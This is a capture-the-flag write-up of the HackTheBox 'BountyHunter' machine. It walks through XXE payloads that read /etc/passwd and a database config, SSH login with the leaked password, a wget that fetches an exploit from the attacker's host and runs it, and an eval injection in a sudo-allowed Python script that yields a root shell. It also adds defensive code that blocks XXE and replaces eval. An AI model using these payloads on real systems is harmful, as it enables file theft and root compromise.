title: HackTheBox-BountyHunter
author: Mosaic Theory
layout: true
categories: 漏洞实验
tags:
- 打靶日记
An egg, if cracked from the outside, is destined to be eaten. If you peck it open, it could be an eagle.
HackTheBox-BountyHunter:
Recon:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 08:58:31 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.11.100
Discovered open port 22/tcp on 10.10.11.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-17 17:01 CST
Nmap scan report for 10.10.11.100
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.53 seconds
There is a button in the top-right corner; clicking it leads here, and whatever you type in is echoed back below. The submission looks like this:
POST /tracker_diRbPr00f314.php HTTP/1.1
Host: bountyhunters.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 225
Origin: http://bountyhunters.htb
DNT: 1
Connection: close
Referer: http://bountyhunters.htb/log_submit.php
data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT50ZXN0PC90aXRsZT4KCQk8Y3dlPmN3ZTwvY3dlPgoJCTxjdnNzPnNhZHNkc2E8L2N2c3M%2BCgkJPHJld2FyZD4xMDAwMDA8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D
The trailing characters are a URL-encoded plus sign and equals sign (%2B and %3D); decoding the Base64 gives the submitted XML:
>> echo PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT50ZXN0PC90aXRsZT4KCQk8Y3dlPmN3ZTwvY3dlPgoJCTxjdnNzPnNhZHNkc2E8L2N2c3M+CgkJPHJld2FyZD4xMDAwMDA8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4=|base64 -d
<?xml version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>test</title>
<cwe>cwe</cwe>
<cvss>sadsdsa</cvss>
<reward>100000</reward>
</bugreport>
We can try submitting a malicious XML document that declares an external entity, Base64-encoded the same way:
>> cat XXE
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT bar ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<bugreport>
<title>&xxe;</title>
<cwe>cwe</cwe>
<cvss>sadsdsa</cvss>
<reward>100000</reward>
</bugreport>
>> base64 -w0 XXE
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PgogIDwhRE9DVFlQRSBmb28gWyAgCiAgPCFFTEVNRU5UIGJhciBBTlkgPgogIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0+CgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU+Jnh4ZTs8L3RpdGxlPgoJCTxjd2U+Y3dlPC9jd2U+CgkJPGN2c3M+c2Fkc2RzYTwvY3Zzcz4KCQk8cmV3YXJkPjEwMDAwMDwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pgo=
Press CTRL + U (in Burp) to URL-encode it once more, and the entity expands inside the Title field of the response.
The development user looks like it can log in, but I could not read an SSH key for it. While gathering path information I noticed db.php:
[17:47:21] 301 - 323B - /assets -> http://bountyhunters.htb/assets/
[17:47:21] 403 - 282B - /assets/
[17:47:29] 301 - 320B - /css -> http://bountyhunters.htb/css/
[17:47:30] 200 - 0B - /db.php
[17:47:40] 200 - 25KB - /index.php
[17:47:40] 200 - 25KB - /index.php/login/
[17:47:42] 403 - 282B - /js/
[17:47:58] 301 - 326B - /resources -> http://bountyhunters.htb/resources/
[17:47:58] 200 - 3KB - /resources/
[17:48:00] 403 - 282B - /server-status/
[17:48:00] 403 - 282B - /server-status
>> cat XXE
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT bar ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php" >]>
<bugreport>
<title>&xxe;</title>
<cwe>cwe</cwe>
<cvss>sadsdsa</cvss>
<reward>100000</reward>
</bugreport>
>> base64 -w0 XXE
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PgogIDwhRE9DVFlQRSBmb28gWyAgCiAgPCFFTEVNRU5UIGJhciBBTlkgPgogIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9L3Zhci93d3cvaHRtbC9kYi5waHAiID5dPgoJCTxidWdyZXBvcnQ+CgkJPHRpdGxlPiZ4eGU7PC90aXRsZT4KCQk8Y3dlPmN3ZTwvY3dlPgoJCTxjdnNzPnNhZHNkc2E8L2N2c3M+CgkJPHJld2FyZD4xMDAwMDA8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4K
>> curl -X POST -d "data=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PgogIDwhRE9DVFlQRSBmb28gWyAgCiAgPCFFTEVNRU5UIGJhciBBTlkgPgogIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9L3Zhci93d3cvaHRtbC9kYi5waHAiID5dPgoJCTxidWdyZXBvcnQ%2bCgkJPHRpdGxlPiZ4eGU7PC90aXRsZT4KCQk8Y3dlPmN3ZTwvY3dlPgoJCTxjdnNzPnNhZHNkc2E8L2N2c3M%2bCgkJPHJld2FyZD4xMDAwMDA8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4K" http://bountyhunters.htb/tracker_diRbPr00f314.php
If DB were ready, would have added:
<table>
<tr>
<td>Title:</td>
<td>PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=</td>
</tr>
<tr>
<td>CWE:</td>
<td>cwe</td>
</tr>
<tr>
<td>Score:</td>
<td>sadsdsa</td>
</tr>
<tr>
<td>Reward:</td>
<td>100000</td>
</tr>
</table>
>> echo PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=|base64 -d
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
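The tracker endpoint expands whatever entities the submitted document declares, which is why the contents of /etc/passwd and a php://filter-encoded db.php came back in the Title cell. The following is an added example of how the server side of that form could have handled the `data` parameter safely; it is not code from the box or from the original write-up. The function names and the two sample `<bugreport>` documents are constructed here, and the element names (`title`, `cwe`, `cvss`, `reward`) are the ones visible in the decoded request above.

```python
"""Hardened handling of the Base64-encoded <bugreport> body that the
tracker endpoint receives in its `data` parameter.

Added example; not code from the target or from the write-up.
Function names and sample documents below are constructed here.
"""
import base64
import io
import re
import urllib.parse
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# A DOCTYPE is the only place an <!ENTITY ...> declaration can live.
# A bug-report form has no legitimate reason to carry one, so fail closed.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)

# Constructed samples: the benign shape the page's form submits, and the
# same document with the external entity the write-up used in <title>.
BENIGN_REPORT = (
    b'<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    b"<bugreport><title>test</title><cwe>cwe</cwe>"
    b"<cvss>sadsdsa</cvss><reward>100000</reward></bugreport>\n"
)
XXE_REPORT = (
    b'<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    b"<!DOCTYPE foo [ <!ELEMENT bar ANY >\n"
    b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
    b"<bugreport><title>&xxe;</title><cwe>cwe</cwe>"
    b"<cvss>sadsdsa</cvss><reward>100000</reward></bugreport>\n"
)
# What the browser would put on the wire for the benign document:
# Base64, then URL-encoded (so '+' becomes %2B and '=' becomes %3D).
SAMPLE_DATA_PARAM = urllib.parse.quote(base64.b64encode(BENIGN_REPORT).decode(), safe="")


def decode_data_param(data_param: str) -> bytes:
    """Reverse the client-side encoding: URL-decode, then strict Base64-decode."""
    return base64.b64decode(urllib.parse.unquote(data_param), validate=True)


def has_doctype(xml_bytes: bytes) -> bool:
    """True if the document carries a DTD (and therefore possibly entities)."""
    return _DOCTYPE_RE.search(xml_bytes) is not None


class _ReportHandler(ContentHandler):
    """Collect the text of the four fields the tracker echoes back."""

    FIELDS = ("title", "cwe", "cvss", "reward")

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name in self.FIELDS:
            self._current = name
            self.fields[name] = ""

    def characters(self, content):
        # expat may deliver one text node in several chunks; append them all.
        if self._current:
            self.fields[self._current] += content

    def endElement(self, name):
        if name == self._current:
            self._current = None


def parse_bugreport(xml_bytes: bytes) -> dict:
    """Parse a <bugreport> and return its fields as a dict.

    Raises ValueError when the document carries a DOCTYPE, so a declaration
    such as <!ENTITY xxe SYSTEM "file:///etc/passwd"> never reaches the parser.
    """
    if has_doctype(xml_bytes):
        raise ValueError("DOCTYPE declarations are not accepted in bug reports")
    parser = xml.sax.make_parser()
    # Defence in depth: even if a DOCTYPE slipped past the check above, expat
    # must not fetch external general entities (files/URLs named by SYSTEM ids).
    parser.setFeature(feature_external_ges, False)
    handler = _ReportHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.fields


if __name__ == "__main__":
    print(parse_bugreport(decode_data_param(SAMPLE_DATA_PARAM)))
    try:
        parse_bugreport(XXE_REPORT)
    except ValueError as err:
        print("rejected:", err)
```

The DOCTYPE check is the part that matters: it removes the whole class of entity tricks (file reads, php://filter, out-of-band lookups) instead of trying to enumerate them. Disabling `feature_external_ges` is a second layer for the case where some other code path feeds a DTD-bearing document into the same parser.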
>> ssh development@10.10.11.100
The authenticity of host '10.10.11.100 (10.10.11.100)' can't be established.
ED25519 key fingerprint is SHA256:p7RCN4B2AtB69d0vE1LTmg0lRRlnsR1fxArJ+KNoNFQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.100' (ED25519) to the list of known hosts.
development@10.10.11.100's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
development@bountyhunter:~$ cat user.txt
cd........................................
Privilege escalation, method one:
development@bountyhunter:~$ wget http://10.10.16.7/CVE-2021-2043.py
--2022-05-17 10:03:41-- http://10.10.16.7/CVE-2021-2043.py
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: ‘CVE-2021-2043.py’
CVE-2021-2043.py 100%[=================================================================>] 3.37K --.-KB/s in 0.1s
2022-05-17 10:03:42 (22.6 KB/s) - ‘CVE-2021-2043.py’ saved [3448/3448]
development@bountyhunter:~$ chmod +x ./CVE-2021-2043.py
development@bountyhunter:~$ ./CVE-2021-2043.py
# id
uid=0(root) gid=0(root) groups=0(root),1000(development)
Privilege escalation, method two:
development@bountyhunter:~$ sudo -l
Matching Defaults entries for development on bountyhunter:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
development@bountyhunter:/opt/skytrain_inc$ cat ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()
This script checks the ticket it reads, and the ticket comes from a .md file:
development@bountyhunter:/opt/skytrain_inc$ ls
invalid_tickets ticketValidator.py
development@bountyhunter:/opt/skytrain_inc$ cd invalid_tickets/
development@bountyhunter:/opt/skytrain_inc/invalid_tickets$ ls
390681613.md 529582686.md 600939065.md 734485704.md
development@bountyhunter:/opt/skytrain_inc/invalid_tickets$ cat 390681613.md
# Skytrain Inc
## Ticket to New Haven
__Ticket Code:__
**31+410+86**
##Issued: 2021/04/06
#End Ticket
development@bountyhunter:/opt/skytrain_inc/invalid_tickets$ cat 529582686.md
# Skytrain Inc
## Ticket to Bridgeport
**32+110+43**
##Issued: 2021/04/06
#End Ticket
development@bountyhunter:/opt/skytrain_inc/invalid_tickets$
It looks like the code line is an addition?
development@bountyhunter:/opt/skytrain_inc$ python3 ticketValidator.py
Please enter the path to the ticket file.
invalid_tickets/529582686.md
Destination: Bridgeport
Invalid ticket.
development@bountyhunter:/opt/skytrain_inc$ python3 ticketValidator.py
Please enter the path to the ticket file.
/opt/skytrain_inc/invalid_tickets/529582686.md
Destination: Bridgeport
Invalid ticket.
development@bountyhunter:/opt/skytrain_inc$
Reading a ticket executes nothing; it only reports whether the ticket is valid. Looking at the code again, as long as the first number leaves a remainder of 4 when divided by 7 and the evaluated sum is greater than 100, it returns a valid ticket to main:
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
The eval call has no filtering at all, so the rest of the code line is evaluated as Python:
# Skytrain Inc
## Ticket to Bridgeport
__Ticket Code:__
**32+110+44+__import__('os').system('bash')**
##Issued: 2021/04/06
#End Ticket
development@bountyhunter:/opt/skytrain_inc$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
/home/development/test.md
Destination: Bridgeport
root@bountyhunter:/opt/skytrain_inc# cat /root/root.txt
1e.....................................
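The root cause here is `eval()` on attacker-controlled text, and the fix is not to filter the string but to evaluate only the grammar the ticket format needs. The following is an added example of a validator with the same acceptance rule (header checks, first number ≡ 4 mod 7, sum greater than 100) that parses the code line with the `ast` module and accepts nothing but integer literals joined by `+`; it is not the file from the box or code from the write-up. The function names and the sample ticket lists are constructed here, using the tickets shown on the page.

```python
"""Ticket validation with the same rule as ticketValidator.py, without eval().

Added example; not the file from the target. It assumes only the ticket
layout shown on the page: a "__Ticket Code:__" marker followed by **a+b+c**.
"""
import ast
import sys
from typing import List


def safe_sum(expr: str) -> int:
    """Evaluate an expression made only of integer literals joined by '+'.

    Names, calls, attribute access and every other operator are rejected, so
    a code line such as 32+110+44+__import__('os').system('bash') raises
    ValueError instead of running a shell.
    """
    tree = ast.parse(expr.strip(), mode="eval")

    def walk(node: ast.AST) -> int:
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            return walk(node.left) + walk(node.right)
        raise ValueError(f"disallowed syntax in ticket code: {type(node).__name__}")

    return walk(tree)


def evaluate_lines(lines: List[str]) -> bool:
    """Apply the original acceptance rule to the lines of one ticket file."""
    code_line = None
    for i, x in enumerate(lines):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            body = x.replace("**", "").strip()
            try:
                ticket_code = int(body.split("+")[0])
                validation_number = safe_sum(body)
            except (ValueError, SyntaxError):
                return False  # malformed or hostile code line: treat as invalid
            return ticket_code % 7 == 4 and validation_number > 100
    return False


# Constructed from the tickets shown on the page.
NEW_HAVEN_TICKET = [
    "# Skytrain Inc\n", "## Ticket to New Haven\n", "__Ticket Code:__\n",
    "**31+410+86**\n", "##Issued: 2021/04/06\n", "#End Ticket\n",
]  # 31 % 7 == 3, so invalid
BRIDGEPORT_TICKET = [
    "# Skytrain Inc\n", "## Ticket to Bridgeport\n", "__Ticket Code:__\n",
    "**32+110+44**\n", "##Issued: 2021/04/06\n", "#End Ticket\n",
]  # 32 % 7 == 4 and 186 > 100, so valid
INJECTED_TICKET = [
    "# Skytrain Inc\n", "## Ticket to Bridgeport\n", "__Ticket Code:__\n",
    "**32+110+44+__import__('os').system('bash')**\n",
    "##Issued: 2021/04/06\n", "#End Ticket\n",
]  # rejected by safe_sum, so invalid


def main(argv: List[str]) -> int:
    if len(argv) != 2 or not argv[1].endswith(".md"):
        print("usage: validator.py <ticket.md>")
        return 2
    with open(argv[1], "r") as ticket:
        print("Valid ticket." if evaluate_lines(ticket.readlines()) else "Invalid ticket.")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Even with `eval()` gone, a script like this should still not be granted as root via `sudo` NOPASSWD: it opens any path the caller names, so a defender reviewing the sudoers entry would also restrict which ticket directory it may read.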
Originally published on the WeChat official account 老鑫安全: HackTheBox-BountyHunter